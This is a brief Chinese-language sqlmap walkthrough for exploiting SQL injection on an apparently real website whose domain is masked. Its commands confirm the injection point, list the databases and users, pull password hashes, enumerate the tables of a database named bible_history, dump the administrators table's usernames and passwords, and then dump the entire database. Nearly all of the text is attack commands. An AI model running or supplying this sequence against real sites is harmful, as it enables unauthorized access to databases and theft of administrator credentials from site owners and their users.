检查注入点是否可用

sqlmap -u “http://www.******.com/subcat.php?id=2” --batch

暴库，看看都有哪些数据库：

#sqlmap -u   --dbs

找出web当前使用的是哪个数据库：

#sqlmap -u http://www.******.com/subcat.php?id=2 --current-db

找出web当前数据库的账户：

#sqlmap -u http://www.******.com/subcat.php?id=2 --current-user

列出数据库所有用户：

#sqlmap -u http://www.******.com/subcat.php?id=2 --users

获取数据库账户与密码：

#sqlmap -u http://www.******.com/subcat.php?id=2 --passwords

获取当前数据库的所有表：

#sqlmap -u http://www.******.com/subcat.php?id=2 -D bible_history --tables

-D  指定数据库

找出表中都有哪些字段：

#sqlmap -u http://www.******.com/subcat.php?id=2 -D bible_history -T administrators --columns

-T 指定表

爆字段内容：

#sqlmap -u http://www.******.com/subcat.php?id=2 -D bible_history -T administrators -C admin_first_name,admin_id,admin_last_name,admin_password,admin_username --dump

 -C：指定字段

 --dump:导出，否则shell上不会显示内容，只能到日志中查看

若内容太多，可以指定显示那一部分：

 --start：指定导出的开始的行

 --stop：指定导出结束的行

#sqlmap -u http://www.******.com/subcat.php?id=2 -D bible_history -T administrators -C admin_first_name,admin_id,admin_last_name,admin_password,admin_username --start 1 --stop 10 --dump

拖库：

#sqlmap -u http://www.******.com/subcat.php?id=2 --dump-all